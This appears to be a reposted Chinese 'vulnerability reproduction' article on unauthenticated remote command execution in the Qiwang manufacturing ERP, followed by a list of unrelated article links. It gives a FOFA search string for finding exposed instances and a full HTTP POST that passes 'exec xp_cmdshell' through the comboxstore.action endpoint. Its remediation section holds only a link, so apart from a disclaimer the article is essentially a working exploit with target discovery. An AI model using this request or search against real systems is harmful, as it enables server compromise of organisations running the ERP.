当前位置: 首页 > news >正文

【漏洞复现】企望制造 ERP命令执行

漏洞描述

由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:title="企望制造ERP系统"

漏洞复现

1.利用如下POC发起POST请求执行whoami命令得到回显


POST /mainFunctions/comboxstore.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56comboxsql=exec%20xp_cmdshell%20'whoami'

在这里插入图片描述

修复方案

http://www.lryc.cn/news/174925.html

相关文章:

  • 2023 “华为杯” 中国研究生数学建模竞赛(E题)深度剖析|数学建模完整代码+建模过程全解全析
  • 【腾讯云国际站】CDN内容分发网络特性介绍
  • 【工业机器人视觉】
  • 跨域(浏览器)
  • Leetcode 2866. Beautiful Towers II
  • 电脑C盘爆红怎么办?(小白篇)
  • Office Xml 2003转XLSX
  • skyWalking搭建(一)
  • Golang开发--sync.WaitGroup
  • Linux命令教程:使用cat命令查看和处理文件
  • Websocket集群解决方案以及实战(附图文源码)
  • 科技的成就(五十一)
  • Tomcat8 任意写文件PUT方法 (CVE-2017-12615)
  • SAP服务器修改主机名操作手册
  • 【大数据】Doris 构建实时数仓落地方案详解(一):实时数据仓库概述
  • C++ list容器的实现及讲解
  • 前端项目练习(练习-002-NodeJS项目初始化)
  • C++QT day11
  • Stable DIffusion 炫酷应用 | AI嵌入艺术字+光影光效
  • C#通过重写Panel改变边框颜色与宽度的方法
  • Vue2+ElementUI 静态首页案例
  • Linux的socket通信
  • MySQL学习大纲
  • 【Ambari】银河麒麟V10 ARM64架构_安装Ambari2.7.6HDP3.3.1(HiDataPlus)
  • 驱动开发练习,platform实现如下功能
  • QT之QString的用法介绍
  • 基于Java+SpringBoot+Vue3+Uniapp前后端分离考试学习一体机设计与实现2.0版本(视频讲解,已发布上线)
  • springboot 获取参数
  • 【笔记】离线Ubuntu20.04+mysql 5.7.36 + xtrabackup定时增量备份脚本
  • 树哈希与换根dp:CF763D